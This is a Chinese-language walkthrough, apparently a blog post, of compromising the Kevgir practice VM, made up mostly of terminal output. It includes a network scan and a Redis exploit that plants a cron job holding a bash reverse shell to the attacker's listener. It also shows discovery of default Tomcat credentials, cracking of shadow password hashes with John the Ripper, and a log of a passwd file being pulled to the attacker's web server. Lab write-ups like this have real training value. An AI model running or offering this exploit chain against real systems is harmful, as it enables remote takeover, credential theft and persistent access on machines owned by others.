promote at ~ ❯ nmap -T5 -sP 192.168.56.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 21:13 CST Nmap scan report for promote.cache-dns.local (192.168.56.1) Host is up (0.00064s latency). Nmap scan report for promote.cache-dns.local (192.168.56.100) Host is up (0.00082s latency). Nmap scan report for promote.cache-dns.local (192.168.56.101) Host is up (0.0025s latency). Nmap done: 256 IP addresses (3 hosts up) scanned in 1.83 seconds
第一个是网关、第二个是本机 ip、第三个就是靶机 Kevgir 了(如何判定?在浏览器输入http://172.20.10.8可以打开运行在其 80 端口的 web 服务。
promote at ~ ❯ nmap -A -p 6379 --script=redis-info 192.168.56.101 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 21:55 CST Nmap scan report for promote.cache-dns.local (192.168.56.101) Host is up (0.00051s latency).
PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 3.0.7 (32 bits) | redis-info: | Version: 3.0.7 | Operating System: Linux 3.19.0-25-generic i686 | Architecture: 32 bits | Process ID: 1185 | Used CPU (sys): 2.13 | Used CPU (user): 0.70 | Connected clients: 1 | Connected slaves: 0 | Used memory: 622.68K | Role: master | Bind addresses: | 0.0.0.0 | Client connections: |_ 192.168.56.1
利用这个漏洞之前,先在本地侦听一个端口。
1 2 3 4
promote at ~ ❯ ncat -lvnp 7999 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::7999 Ncat: Listening on 0.0.0.0:7999
注意到本机的 ip 是:10.32.187.196。
连接到 redis-cli,准备利用 crontab 反弹 shell
1 2 3 4 5 6 7 8 9 10 11 12 13
promote at ~ ❯ redis-cli -h 192.168.56.101 192.168.56.101:6379> set x "\n* * * * * bash -i >& /dev/tcp/10.32.187.196/7999 0>&1\n" OK 192.168.56.101:6379> config set dir /var/spool/cron/ OK 192.168.56.101:6379> config set dbfilename root OK 192.168.56.101:6379> save OK 192.168.56.101:6379> keys * 1) "x" 192.168.56.101:6379> get x "\n* * * * * bash -i >& /dev/tcp/10.32.187.196/7999 0>&1\n"
promote at ~ ❯ nikto -h 192.168.56.101 -p 8080 -o kevgir.8080.html - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.56.101 + Target Hostname: 192.168.56.101 + Target Port: 8080 + Start Time: 2020-08-20 13:03:40 (GMT8) --------------------------------------------------------------------------- + Server: Apache-Coyote/1.1 + Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1454530701000 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + /: Appears to be a default Apache Tomcat install. + /examples/servlets/index.html: Apache Tomcat default JSP pages present. + OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. + Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat. + /manager/html: Tomcat Manager / Host Manager interface found (pass protected) + /host-manager/html: Tomcat Manager / Host Manager interface found (pass protected) + /manager/status: Tomcat Server Status interface found (pass protected) + 7661 requests: 0 error(s) and 14 item(s) reported on remote host + End Time: 2020-08-20 13:03:48 (GMT8) (8 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
在报告里发现有默认口令的登陆页面:
URI
/manager/html
HTTP Method
GET
Description
Default account found for ‘Tomcat Manager Application’ at /manager/html (ID ‘tomcat’, PW ‘tomcat’). Apache Tomcat.
➜ ~ john shadow Created directory: /root/.john Using default input encoding: UTF-8 Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status admin (admin) Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance. resu (user) Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance. Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance. Almost done: Processing the remaining buffered candidate passwords, if any. Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance. Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist 2g 0:00:00:17 33.62% 2/3 (ETA: 13:37:38) 0.1174g/s 3439p/s 3439c/s 3439C/s blazer0..copper0 Proceeding with incremental:ASCII
promote at ~ ❯ http-server . Starting up http-server, serving . Available on: http://127.0.0.1:8080 http://10.32.187.196:8080 http://192.168.56.1:8080 http://10.211.55.2:8080 http://192.168.57.2:8080 Hit CTRL-C to stop the server [2020-08-19T05:50:16.269Z] "GET /" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" (node:84873) [DEP0066] DeprecationWarning: OutgoingMessage.prototype._headers is deprecated [2020-08-19T05:50:16.602Z] "GET /favicon.ico" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" [2020-08-19T05:50:16.603Z] "GET /favicon.ico" Error (404): "Not found" [2020-08-19T05:50:37.045Z] "GET /passwd" "Wget/1.15 (linux-gnu)" [2020-08-19T05:51:02.060Z] "GET /passwd" "Wget/1.15 (linux-gnu)"
Comments